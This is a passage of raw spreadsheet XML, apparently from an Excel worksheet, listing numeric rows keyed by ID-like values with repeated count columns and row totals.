        <v>1</v>
      </c>
      <c r="D1431" s="8">
        <v>0</v>
      </c>
      <c r="E1431" s="8">
        <v>0</v>
      </c>
      <c r="F1431" s="8">
        <v>5</v>
      </c>
      <c r="G1431" s="8">
        <v>3</v>
      </c>
      <c r="H1431" s="8">
        <v>34</v>
      </c>
      <c r="K1431" s="7">
        <v>5505</v>
      </c>
      <c r="L1431" s="8">
        <v>25</v>
      </c>
      <c r="M1431" s="8">
        <v>1</v>
      </c>
      <c r="N1431" s="8">
        <v>0</v>
      </c>
      <c r="O1431" s="8">
        <v>0</v>
      </c>
      <c r="P1431" s="8">
        <v>5</v>
      </c>
      <c r="Q1431" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1432" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1432" s="7">
        <v>5507</v>
      </c>
      <c r="B1432" s="8">
        <v>20</v>
      </c>
      <c r="C1432" s="8">
        <v>0</v>
      </c>
      <c r="D1432" s="8">
        <v>10</v>
      </c>
      <c r="E1432" s="8">
        <v>0</v>
      </c>
      <c r="F1432" s="8">
        <v>0</v>
      </c>
      <c r="G1432" s="8">
        <v>0</v>
      </c>
      <c r="H1432" s="8">
        <v>30</v>
      </c>
      <c r="K1432" s="7">
        <v>5507</v>
      </c>
      <c r="L1432" s="8">
        <v>20</v>
      </c>
      <c r="M1432" s="8">
        <v>0</v>
      </c>
      <c r="N1432" s="8">
        <v>10</v>
      </c>
      <c r="O1432" s="8">
        <v>0</v>
      </c>
      <c r="P1432" s="8">
        <v>0</v>
      </c>
      <c r="Q1432" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1433" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1433" s="7">
        <v>5508</v>
      </c>
      <c r="B1433" s="8">
        <v>5</v>
      </c>
      <c r="C1433" s="8">
        <v>5</v>
      </c>
      <c r="D1433" s="8">
        <v>4</v>
      </c>
      <c r="E1433" s="8">
        <v>8</v>
      </c>
      <c r="F1433" s="8">
        <v>8</v>
      </c>
      <c r="G1433" s="8">
        <v>0</v>
      </c>
      <c r="H1433" s="8">
        <v>30</v>
      </c>
      <c r="K1433" s="7">
        <v>5508</v>
      </c>
      <c r="L1433" s="8">
        <v>5</v>
      </c>
      <c r="M1433" s="8">
        <v>5</v>
      </c>
      <c r="N1433" s="8">
        <v>4</v>
      </c>
      <c r="O1433" s="8">
        <v>8</v>
      </c>
      <c r="P1433" s="8">
        <v>8</v>
      </c>
      <c r="Q1433" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1434" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1434" s="7">
        <v>5509</v>
      </c>
      <c r="B1434" s="8">
        <v>30</v>
      </c>
      <c r="C1434" s="8">
        <v>0</v>
      </c>
      <c r="D1434" s="8">
        <v>0</v>
      </c>
      <c r="E1434" s="8">
        <v>0</v>
      </c>
      <c r="F1434" s="8">
        <v>1</v>
      </c>
      <c r="G1434" s="8">
        <v>3</v>
      </c>
      <c r="H1434" s="8">
        <v>34</v>
      </c>
      <c r="K1434" s="7">
        <v>5509</v>
      </c>
      <c r="L1434" s="8">
        <v>30</v>
      </c>
      <c r="M1434" s="8">
        <v>0</v>
      </c>
      <c r="N1434" s="8">
        <v>0</v>
      </c>
      <c r="O1434" s="8">
        <v>0</v>
      </c>
      <c r="P1434" s="8">
        <v>1</v>
      </c>
      <c r="Q1434" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1435" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1435" s="7">
        <v>5510</v>
      </c>
      <c r="B1435" s="8">
        <v>25</v>
      </c>
      <c r="C1435" s="8">
        <v>1</v>
      </c>
      <c r="D1435" s="8">
        <v>30</v>
      </c>
      <c r="E1435" s="8">
        <v>20</v>
      </c>
      <c r="F1435" s="8">
        <v>8</v>
      </c>
      <c r="G1435" s="8">
        <v>3</v>
      </c>
      <c r="H1435" s="8">
        <v>87</v>
      </c>
      <c r="K1435" s="7">
        <v>5510</v>
      </c>
      <c r="L1435" s="8">
        <v>25</v>
      </c>
      <c r="M1435" s="8">
        <v>1</v>
      </c>
      <c r="N1435" s="8">
        <v>30</v>
      </c>
      <c r="O1435" s="8">
        <v>20</v>
      </c>
      <c r="P1435" s="8">
        <v>8</v>
      </c>
      <c r="Q1435" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1436" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1436" s="7">
        <v>5514</v>
      </c>
      <c r="B1436" s="8">
        <v>26</v>
      </c>
      <c r="C1436" s="8">
        <v>1</v>
      </c>
      <c r="D1436" s="8">
        <v>4</v>
      </c>
      <c r="E1436" s="8">
        <v>4</v>
      </c>
      <c r="F1436" s="8">
        <v>5</v>
      </c>
      <c r="G1436" s="8">
        <v>4</v>
      </c>
      <c r="H1436" s="8">
        <v>44</v>
      </c>
      <c r="K1436" s="7">
        <v>5514</v>
      </c>
      <c r="L1436" s="8">
        <v>26</v>
      </c>
      <c r="M1436" s="8">
        <v>1</v>
      </c>
      <c r="N1436" s="8">
        <v>4</v>
      </c>
      <c r="O1436" s="8">
        <v>4</v>
      </c>
      <c r="P1436" s="8">
        <v>5</v>
      </c>
      <c r="Q1436" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1437" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1437" s="7">
        <v>5522</v>
      </c>
      <c r="B1437" s="8">
        <v>30</v>
      </c>
      <c r="C1437" s="8">
        <v>1</v>
      </c>
      <c r="D1437" s="8">
        <v>0</v>
      </c>
      <c r="E1437" s="8">
        <v>0</v>
      </c>
      <c r="F1437" s="8">
        <v>11</v>
      </c>
      <c r="G1437" s="8">
        <v>3</v>
      </c>
      <c r="H1437" s="8">
        <v>45</v>
      </c>
      <c r="K1437" s="7">
        <v>5522</v>
      </c>
      <c r="L1437" s="8">
        <v>30</v>
      </c>
      <c r="M1437" s="8">
        <v>1</v>
      </c>
      <c r="N1437" s="8">
        <v>0</v>
      </c>
      <c r="O1437" s="8">
        <v>0</v>
      </c>
      <c r="P1437" s="8">
        <v>11</v>
      </c>
      <c r="Q1437" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1438" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1438" s="7">
        <v>5523</v>
      </c>
      <c r="B1438" s="8">
        <v>25</v>
      </c>
      <c r="C1438" s="8">
        <v>1</v>
      </c>
      <c r="D1438" s="8">
        <v>0</v>
      </c>
      <c r="E1438" s="8">
        <v>0</v>
      </c>
      <c r="F1438" s="8">
        <v>3</v>
      </c>
      <c r="G1438" s="8">
        <v>2</v>
      </c>
      <c r="H1438" s="8">
        <v>31</v>
      </c>
      <c r="K1438" s="7">
        <v>5523</v>
      </c>
      <c r="L1438" s="8">
        <v>25</v>
      </c>
      <c r="M1438" s="8">
        <v>1</v>
      </c>
      <c r="N1438" s="8">
        <v>0</v>
      </c>
      <c r="O1438" s="8">
        <v>0</v>
      </c>
      <c r="P1438" s="8">
        <v>3</v>
      </c>
      <c r="Q1438" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1439" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1439" s="7">
        <v>5527</v>
      </c>
      <c r="B1439" s="8">
        <v>5</v>
      </c>
      <c r="C1439" s="8">
        <v>0</v>
      </c>
      <c r="D1439" s="8">
        <v>1</v>
      </c>
      <c r="E1439" s="8">
        <v>3</v>
      </c>
      <c r="F1439" s="8">
        <v>2</v>
      </c>
      <c r="G1439" s="8">
        <v>4</v>
      </c>
      <c r="H1439" s="8">
        <v>15</v>
      </c>
      <c r="K1439" s="7">
        <v>5527</v>
      </c>
      <c r="L1439" s="8">
        <v>5</v>
      </c>
      <c r="M1439" s="8">
        <v>0</v>
      </c>
      <c r="N1439" s="8">
        <v>1</v>
      </c>
      <c r="O1439" s="8">
        <v>3</v>
      </c>
      <c r="P1439" s="8">
        <v>2</v>
      </c>
      <c r="Q1439" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1440" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1440" s="7">
        <v>5529</v>
      </c>
      <c r="B1440" s="8">
        <v>20</v>
      </c>
      <c r="C1440" s="8">
        <v>1</v>
      </c>
      <c r="D1440" s="8">
        <v>0</v>
      </c>
      <c r="E1440" s="8">
        <v>0</v>
      </c>
      <c r="F1440" s="8">
        <v>1</v>
      </c>
      <c r="G1440" s="8">
        <v>4</v>
      </c>
      <c r="H1440" s="8">
        <v>26</v>
      </c>
      <c r="K1440" s="7">
        <v>5529</v>
      </c>
      <c r="L1440" s="8">
        <v>20</v>
      </c>
      <c r="M1440" s="8">
        <v>1</v>
      </c>
      <c r="N1440" s="8">
        <v>0</v>
      </c>
      <c r="O1440" s="8">
        <v>0</v>
      </c>
      <c r="P1440" s="8">
        <v>1</v>
      </c>
      <c r="Q1440" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1441" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1441" s="7">
        <v>5531</v>
      </c>
      <c r="B1441" s="8">
        <v>5</v>
      </c>
      <c r="C1441" s="8">
        <v>1</v>
      </c>
      <c r="D1441" s="8">
        <v>0</v>
      </c>
      <c r="E1441" s="8">
        <v>0</v>
      </c>
      <c r="F1441" s="8">
        <v>9</v>
      </c>
      <c r="G1441" s="8">
        <v>19</v>
      </c>
      <c r="H1441" s="8">
        <v>34</v>
      </c>
      <c r="K1441" s="7">
        <v>5531</v>
      </c>
      <c r="L1441" s="8">
        <v>5</v>
      </c>
      <c r="M1441" s="8">
        <v>1</v>
      </c>
      <c r="N1441" s="8">
        <v>0</v>
      </c>
      <c r="O1441" s="8">
        <v>0</v>
      </c>
      <c r="P1441" s="8">
        <v>9</v>
      </c>
      <c r="Q1441" s="8">
        <v>19</v>
      </c>
    </row>
    <row r="1442" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1442" s="7">
        <v>5532</v>
      </c>
      <c r="B1442" s="8">
        <v>25</v>
      </c>
      <c r="C1442" s="8">
        <v>1</v>
      </c>
      <c r="D1442" s="8">
        <v>0</v>
      </c>
      <c r="E1442" s="8">
        <v>2</v>
      </c>
      <c r="F1442" s="8">
        <v>3</v>
      </c>
      <c r="G1442" s="8">
        <v>4</v>
      </c>
      <c r="H1442" s="8">
        <v>35</v>
      </c>
      <c r="K1442" s="7">
        <v>5532</v>
      </c>
      <c r="L1442" s="8">
        <v>25</v>
      </c>
      <c r="M1442" s="8">
        <v>1</v>
      </c>
      <c r="N1442" s="8">
        <v>0</v>
      </c>
      <c r="O1442" s="8">
        <v>2</v>
      </c>
      <c r="P1442" s="8">
        <v>3</v>
      </c>
      <c r="Q1442" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1443" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1443" s="7">
        <v>5535</v>
      </c>
      <c r="B1443" s="8">
        <v>24</v>
      </c>
      <c r="C1443" s="8">
        <v>1</v>
      </c>
      <c r="D1443" s="8">
        <v>0</v>
      </c>
      <c r="E1443" s="8">
        <v>0</v>
      </c>
      <c r="F1443" s="8">
        <v>20</v>
      </c>
      <c r="G1443" s="8">
        <v>4</v>
      </c>
      <c r="H1443" s="8">
        <v>49</v>
      </c>
      <c r="K1443" s="7">
        <v>5535</v>
      </c>
      <c r="L1443" s="8">
        <v>24</v>
      </c>
      <c r="M1443" s="8">
        <v>1</v>
      </c>
      <c r="N1443" s="8">
        <v>0</v>
      </c>
      <c r="O1443" s="8">
        <v>0</v>
      </c>
      <c r="P1443" s="8">
        <v>20</v>
      </c>
      <c r="Q1443" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1444" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1444" s="7">
        <v>5537</v>
      </c>
      <c r="B1444" s="8">
        <v>25</v>
      </c>
      <c r="C1444" s="8">
        <v>1</v>
      </c>
      <c r="D1444" s="8">
        <v>2</v>
      </c>
      <c r="E1444" s="8">
        <v>0</v>
      </c>
      <c r="F1444" s="8">
        <v>0</v>
      </c>
      <c r="G1444" s="8">
        <v>0</v>
      </c>
      <c r="H1444" s="8">
        <v>28</v>
      </c>
      <c r="K1444" s="7">
        <v>5537</v>
      </c>
      <c r="L1444" s="8">
        <v>25</v>
      </c>
      <c r="M1444" s="8">
        <v>1</v>
      </c>
      <c r="N1444" s="8">
        <v>2</v>
      </c>
      <c r="O1444" s="8">
        <v>0</v>
      </c>
      <c r="P1444" s="8">
        <v>0</v>
      </c>
      <c r="Q1444" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1445" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1445" s="7">
        <v>5540</v>
      </c>
      <c r="B1445" s="8">
        <v>0</v>
      </c>
      <c r="C1445" s="8">
        <v>0</v>
      </c>
      <c r="D1445" s="8">
        <v>0</v>
      </c>
      <c r="E1445" s="8">
        <v>0</v>
      </c>
      <c r="F1445" s="8">
        <v>40</v>
      </c>
      <c r="G1445" s="8">
        <v>0</v>
      </c>
      <c r="H1445" s="8">
        <v>40</v>
      </c>
      <c r="K1445" s="7">
        <v>5540</v>
      </c>
      <c r="L1445" s="8">
        <v>0</v>
      </c>
      <c r="M1445" s="8">
        <v>0</v>
      </c>
      <c r="N1445" s="8">
        <v>0</v>
      </c>
      <c r="O1445" s="8">
        <v>0</v>
      </c>
      <c r="P1445" s="8">
        <v>40</v>
      </c>
      <c r="Q1445" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1446" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1446" s="7">
        <v>5541</v>
      </c>
      <c r="B1446" s="8">
        <v>6</v>
      </c>
      <c r="C1446" s="8">
        <v>1</v>
      </c>
      <c r="D1446" s="8">
        <v>8</v>
      </c>
      <c r="E1446" s="8">
        <v>2</v>
      </c>
      <c r="F1446" s="8">
        <v>5</v>
      </c>
      <c r="G1446" s="8">
        <v>2</v>
      </c>
      <c r="H1446" s="8">
        <v>24</v>
      </c>
      <c r="K1446" s="7">
        <v>5541</v>
      </c>
      <c r="L1446" s="8">
        <v>6</v>
      </c>
      <c r="M1446" s="8">
        <v>1</v>
      </c>
      <c r="N1446" s="8">
        <v>8</v>
      </c>
      <c r="O1446" s="8">
        <v>2</v>
      </c>
      <c r="P1446" s="8">
        <v>5</v>
      </c>
      <c r="Q1446" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1447" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1447" s="7">
        <v>5543</v>
      </c>
      <c r="B1447" s="8">
        <v>6</v>
      </c>
      <c r="C1447" s="8">
        <v>1</v>
      </c>
      <c r="D1447" s="8">
        <v>21</v>
      </c>
      <c r="E1447" s="8">
        <v>25</v>
      </c>
      <c r="F1447" s="8">
        <v>11</v>
      </c>
      <c r="G1447" s="8">
        <v>19</v>
      </c>
      <c r="H1447" s="8">
        <v>83</v>
      </c>
      <c r="K1447" s="7">
        <v>5543</v>
      </c>
      <c r="L1447" s="8">
        <v>6</v>
      </c>
      <c r="M1447" s="8">
        <v>1</v>
      </c>
      <c r="N1447" s="8">
        <v>21</v>
      </c>
      <c r="O1447" s="8">
        <v>25</v>
      </c>
      <c r="P1447" s="8">
        <v>11</v>
      </c>
      <c r="Q1447" s="8">
        <v>19</v>
      </c>
    </row>
    <row r="1448" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1448" s="7">
        <v>5549</v>
      </c>
      <c r="B1448" s="8">
        <v>1</v>
      </c>
      <c r="C1448" s="8">
        <v>1</v>
      </c>
      <c r="D1448" s="8">
        <v>13</v>
      </c>
      <c r="E1448" s="8">
        <v>12</v>
      </c>
      <c r="F1448" s="8">
        <v>4</v>
      </c>
      <c r="G1448" s="8">
        <v>4</v>
      </c>
      <c r="H1448" s="8">
        <v>35</v>
      </c>
      <c r="K1448" s="7">
        <v>5549</v>
      </c>
      <c r="L1448" s="8">
        <v>1</v>
      </c>
      <c r="M1448" s="8">
        <v>1</v>
      </c>
      <c r="N1448" s="8">
        <v>13</v>
      </c>
      <c r="O1448" s="8">
        <v>12</v>
      </c>
      <c r="P1448" s="8">
        <v>4</v>
      </c>
      <c r="Q1448" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1449" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1449" s="7">
        <v>5552</v>
      </c>
      <c r="B1449" s="8">
        <v>26</v>
      </c>
      <c r="C1449" s="8">
        <v>1</v>
      </c>
      <c r="D1449" s="8">
        <v>10</v>
      </c>
      <c r="E1449" s="8">
        <v>5</v>
      </c>
      <c r="F1449" s="8">
        <v>3</v>
      </c>
      <c r="G1449" s="8">
        <v>0</v>
      </c>
      <c r="H1449" s="8">
        <v>45</v>
      </c>
      <c r="K1449" s="7">
        <v>5552</v>
      </c>
      <c r="L1449" s="8">
        <v>26</v>
      </c>
      <c r="M1449" s="8">
        <v>1</v>
      </c>
      <c r="N1449" s="8">
        <v>10</v>
      </c>
      <c r="O1449" s="8">
        <v>5</v>
      </c>
      <c r="P1449" s="8">
        <v>3</v>
      </c>
      <c r="Q1449" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1450" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1450" s="7">
        <v>5554</v>
      </c>
      <c r="B1450" s="8">
        <v>26</v>
      </c>
      <c r="C1450" s="8">
        <v>1</v>
      </c>
      <c r="D1450" s="8">
        <v>5</v>
      </c>
      <c r="E1450" s="8">
        <v>0</v>
      </c>
      <c r="F1450" s="8">
        <v>9</v>
      </c>
      <c r="G1450" s="8">
        <v>2</v>
      </c>
      <c r="H1450" s="8">
        <v>43</v>
      </c>
      <c r="K1450" s="7">
        <v>5554</v>
      </c>
      <c r="L1450" s="8">
        <v>26</v>
      </c>
      <c r="M1450" s="8">
        <v>1</v>
      </c>
      <c r="N1450" s="8">
        <v>5</v>
      </c>
      <c r="O1450" s="8">
        <v>0</v>
      </c>
      <c r="P1450" s="8">
        <v>9</v>
      </c>
      <c r="Q1450" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1451" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1451" s="7">
        <v>5561</v>
      </c>
      <c r="B1451" s="8">
        <v>25</v>
      </c>
      <c r="C1451" s="8">
        <v>0</v>
      </c>
      <c r="D1451" s="8">
        <v>0</v>
      </c>
      <c r="E1451" s="8">
        <v>0</v>
      </c>
      <c r="F1451" s="8">
        <v>9</v>
      </c>
      <c r="G1451" s="8">
        <v>8</v>
      </c>
      <c r="H1451" s="8">
        <v>42</v>
      </c>
      <c r="K1451" s="7">
        <v>5561</v>
      </c>
      <c r="L1451" s="8">
        <v>25</v>
      </c>
      <c r="M1451" s="8">
        <v>0</v>
      </c>
      <c r="N1451" s="8">
        <v>0</v>
      </c>
      <c r="O1451" s="8">
        <v>0</v>
      </c>
      <c r="P1451" s="8">
        <v>9</v>
      </c>
      <c r="Q1451" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1452" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1452" s="7">
        <v>5566</v>
      </c>
      <c r="B1452" s="8">
        <v>26</v>
      </c>
      <c r="C1452" s="8">
        <v>1</v>
      </c>
      <c r="D1452" s="8">
        <v>6</v>
      </c>
      <c r="E1452" s="8">
        <v>0</v>
      </c>
      <c r="F1452" s="8">
        <v>0</v>
      </c>
      <c r="G1452" s="8">
        <v>2</v>
      </c>
      <c r="H1452" s="8">
        <v>35</v>
      </c>
      <c r="K1452" s="7">
        <v>5566</v>
      </c>
      <c r="L1452" s="8">
        <v>26</v>
      </c>
      <c r="M1452" s="8">
        <v>1</v>
      </c>
      <c r="N1452" s="8">
        <v>6</v>
      </c>
      <c r="O1452" s="8">
        <v>0</v>
      </c>
      <c r="P1452" s="8">
        <v>0</v>
      </c>
      <c r="Q1452" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1453" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1453" s="7">
        <v>5568</v>
      </c>
      <c r="B1453" s="8">
        <v>30</v>
      </c>
      <c r="C1453" s="8">
        <v>0</v>
      </c>
      <c r="D1453" s="8">
        <v>5</v>
      </c>
      <c r="E1453" s="8">
        <v>0</v>
      </c>
      <c r="F1453" s="8">
        <v>12</v>
      </c>
      <c r="G1453" s="8">
        <v>2</v>
      </c>
      <c r="H1453" s="8">
        <v>49</v>
      </c>
      <c r="K1453" s="7">
        <v>5568</v>
      </c>
      <c r="L1453" s="8">
        <v>30</v>
      </c>
      <c r="M1453" s="8">
        <v>0</v>
      </c>
      <c r="N1453" s="8">
        <v>5</v>
      </c>
      <c r="O1453" s="8">
        <v>0</v>
      </c>
      <c r="P1453" s="8">
        <v>12</v>
      </c>
      <c r="Q1453" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1454" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1454" s="7">
        <v>5570</v>
      </c>
      <c r="B1454" s="8">
        <v>6</v>
      </c>
      <c r="C1454" s="8">
        <v>1</v>
      </c>
      <c r="D1454" s="8">
        <v>0</v>
      </c>
      <c r="E1454" s="8">
        <v>0</v>
      </c>
      <c r="F1454" s="8">
        <v>10</v>
      </c>
      <c r="G1454" s="8">
        <v>5</v>
      </c>
      <c r="H1454" s="8">
        <v>22</v>
      </c>
      <c r="K1454" s="7">
        <v>5570</v>
      </c>
      <c r="L1454" s="8">
        <v>6</v>
      </c>
      <c r="M1454" s="8">
        <v>1</v>
      </c>
      <c r="N1454" s="8">
        <v>0</v>
      </c>
      <c r="O1454" s="8">
        <v>0</v>
      </c>
      <c r="P1454" s="8">
        <v>10</v>
      </c>
      <c r="Q1454" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1455" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1455" s="7">
        <v>5571</v>
      </c>
      <c r="B1455" s="8">
        <v>28</v>
      </c>
      <c r="C1455" s="8">
        <v>1</v>
      </c>
      <c r="D1455" s="8">
        <v>0</v>
      </c>
      <c r="E1455" s="8">
        <v>2</v>
      </c>
      <c r="F1455" s="8">
        <v>1</v>
      </c>
      <c r="G1455" s="8">
        <v>1</v>
      </c>
      <c r="H1455" s="8">
        <v>33</v>
      </c>
      <c r="K1455" s="7">
        <v>5571</v>
      </c>
      <c r="L1455" s="8">
        <v>28</v>
      </c>
      <c r="M1455" s="8">
        <v>1</v>
      </c>
      <c r="N1455" s="8">
        <v>0</v>
      </c>
      <c r="O1455" s="8">
        <v>2</v>
      </c>
      <c r="P1455" s="8">
        <v>1</v>
      </c>
      <c r="Q1455" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1456" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1456" s="7">
        <v>5572</v>
      </c>
      <c r="B1456" s="8">
        <v>5</v>
      </c>
      <c r="C1456" s="8">
        <v>4</v>
      </c>
      <c r="D1456" s="8">
        <v>6</v>
      </c>
      <c r="E1456" s="8">
        <v>8</v>
      </c>
      <c r="F1456" s="8">
        <v>19</v>
      </c>
      <c r="G1456" s="8">
        <v>9</v>
      </c>
      <c r="H1456" s="8">
        <v>51</v>
      </c>
      <c r="K1456" s="7">
        <v>5572</v>
      </c>
      <c r="L1456" s="8">
        <v>5</v>
      </c>
      <c r="M1456" s="8">
        <v>4</v>
      </c>
      <c r="N1456" s="8">
        <v>6</v>
      </c>
      <c r="O1456" s="8">
        <v>8</v>
      </c>
      <c r="P1456" s="8">
        <v>19</v>
      </c>
      <c r="Q1456" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1457" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1457" s="7">
        <v>5576</v>
      </c>
      <c r="B1457" s="8">
        <v>30</v>
      </c>
      <c r="C1457" s="8">
        <v>1</v>
      </c>
      <c r="D1457" s="8">
        <v>0</v>
      </c>
      <c r="E1457" s="8">
        <v>0</v>
      </c>
      <c r="F1457" s="8">
        <v>3</v>
      </c>
      <c r="G1457" s="8">
        <v>13</v>
      </c>
      <c r="H1457" s="8">
        <v>47</v>
      </c>
      <c r="K1457" s="7">
        <v>5576</v>
      </c>
      <c r="L1457" s="8">
        <v>30</v>
      </c>
      <c r="M1457" s="8">
        <v>1</v>
      </c>
      <c r="N1457" s="8">
        <v>0</v>
      </c>
      <c r="O1457" s="8">
        <v>0</v>
      </c>
      <c r="P1457" s="8">
        <v>3</v>
      </c>
      <c r="Q1457" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="1458" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1458" s="7">
        <v>5577</v>
      </c>
      <c r="B1458" s="8">
        <v>20</v>
      </c>
      <c r="C1458" s="8">
        <v>1</v>
      </c>
      <c r="D1458" s="8">
        <v>0</v>
      </c>
      <c r="E1458" s="8">
        <v>1</v>
      </c>
      <c r="F1458" s="8">
        <v>2</v>
      </c>
      <c r="G1458" s="8">
        <v>4</v>
      </c>
      <c r="H1458" s="8">
        <v>28</v>
      </c>
      <c r="K1458" s="7">
        <v>5577</v>
      </c>
      <c r="L1458" s="8">
        <v>20</v>
      </c>
      <c r="M1458" s="8">
        <v>1</v>
      </c>
      <c r="N1458" s="8">
        <v>0</v>
      </c>
      <c r="O1458" s="8">
        <v>1</v>
      </c>
      <c r="P1458" s="8">
        <v>2</v>
      </c>
      <c r="Q1458" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1459" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1459" s="7">
        <v>5582</v>
      </c>
      <c r="B1459" s="8">
        <v>0</v>
      </c>
      <c r="C1459" s="8">
        <v>0</v>
      </c>
      <c r="D1459" s="8">
        <v>0</v>
      </c>
      <c r="E1459" s="8">
        <v>0</v>
      </c>
      <c r="F1459" s="8">
        <v>7</v>
      </c>
      <c r="G1459" s="8">
        <v>2</v>
      </c>
      <c r="H1459" s="8">
        <v>9</v>
      </c>
      <c r="K1459" s="7">
        <v>5582</v>
      </c>
      <c r="L1459" s="8">
        <v>0</v>
      </c>
      <c r="M1459" s="8">
        <v>0</v>
      </c>
      <c r="N1459" s="8">
        <v>0</v>
      </c>
      <c r="O1459" s="8">
        <v>0</v>
      </c>
      <c r="P1459" s="8">
        <v>7</v>
      </c>
      <c r="Q1459" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1460" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1460" s="7">
        <v>5590</v>
      </c>
      <c r="B1460" s="8">
        <v>26</v>
      </c>
      <c r="C1460" s="8">
        <v>1</v>
      </c>
      <c r="D1460" s="8">
        <v>18</v>
      </c>
      <c r="E1460" s="8">
        <v>70</v>
      </c>
      <c r="F1460" s="8">
        <v>54</v>
      </c>
      <c r="G1460" s="8">
        <v>86</v>
      </c>
      <c r="H1460" s="8">
        <v>255</v>
      </c>
      <c r="K1460" s="7">
        <v>5590</v>
      </c>
      <c r="L1460" s="8">
        <v>26</v>
      </c>
      <c r="M1460" s="8">
        <v>1</v>
      </c>
      <c r="N1460" s="8">
        <v>18</v>
      </c>
      <c r="O1460" s="8">
        <v>70</v>
      </c>
      <c r="P1460" s="8">
        <v>54</v>
      </c>
      <c r="Q1460" s="8">
        <v>86</v>
      </c>
    </row>
    <row r="1461" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1461" s="7">
        <v>5594</v>
      </c>
      <c r="B1461" s="8">
        <v>26</v>
      </c>
      <c r="C1461" s="8">
        <v>0</v>
      </c>
      <c r="D1461" s="8">
        <v>6</v>
      </c>
      <c r="E1461" s="8">
        <v>0</v>
      </c>
      <c r="F1461" s="8">
        <v>5</v>
      </c>
      <c r="G1461" s="8">
        <v>0</v>
      </c>
      <c r="H1461" s="8">
        <v>37</v>
      </c>
      <c r="K1461" s="7">
        <v>5594</v>
      </c>
      <c r="L1461" s="8">
        <v>26</v>
      </c>
      <c r="M1461" s="8">
        <v>0</v>
      </c>
      <c r="N1461" s="8">
        <v>6</v>
      </c>
      <c r="O1461" s="8">
        <v>0</v>
      </c>
      <c r="P1461" s="8">
        <v>5</v>
      </c>
      <c r="Q1461" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1462" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1462" s="7">
        <v>5595</v>
      </c>
      <c r="B1462" s="8">
        <v>25</v>
      </c>
      <c r="C1462" s="8">
        <v>1</v>
      </c>
      <c r="D1462" s="8">
        <v>0</v>
      </c>
      <c r="E1462" s="8">
        <v>0</v>
      </c>
      <c r="F1462" s="8">
        <v>1</v>
      </c>
      <c r="G1462" s="8">
        <v>0</v>
      </c>
      <c r="H1462" s="8">
        <v>27</v>
      </c>
      <c r="K1462" s="7">
        <v>5595</v>
      </c>
      <c r="L1462" s="8">
        <v>25</v>
      </c>
      <c r="M1462" s="8">
        <v>1</v>
      </c>
      <c r="N1462" s="8">
        <v>0</v>
      </c>
      <c r="O1462" s="8">
        <v>0</v>
      </c>
      <c r="P1462" s="8">
        <v>1</v>
      </c>
      <c r="Q1462" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1463" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1463" s="7">
        <v>5596</v>
      </c>
      <c r="B1463" s="8">
        <v>26</v>
      </c>
      <c r="C1463" s="8">
        <v>1</v>
      </c>
      <c r="D1463" s="8">
        <v>5</v>
      </c>
      <c r="E1463" s="8">
        <v>0</v>
      </c>
      <c r="F1463" s="8">
        <v>12</v>
      </c>
      <c r="G1463" s="8">
        <v>2</v>
      </c>
      <c r="H1463" s="8">
        <v>46</v>
      </c>
      <c r="K1463" s="7">
        <v>5596</v>
      </c>
      <c r="L1463" s="8">
        <v>26</v>
      </c>
      <c r="M1463" s="8">
        <v>1</v>
      </c>
      <c r="N1463" s="8">
        <v>5</v>
      </c>
      <c r="O1463" s="8">
        <v>0</v>
      </c>
      <c r="P1463" s="8">
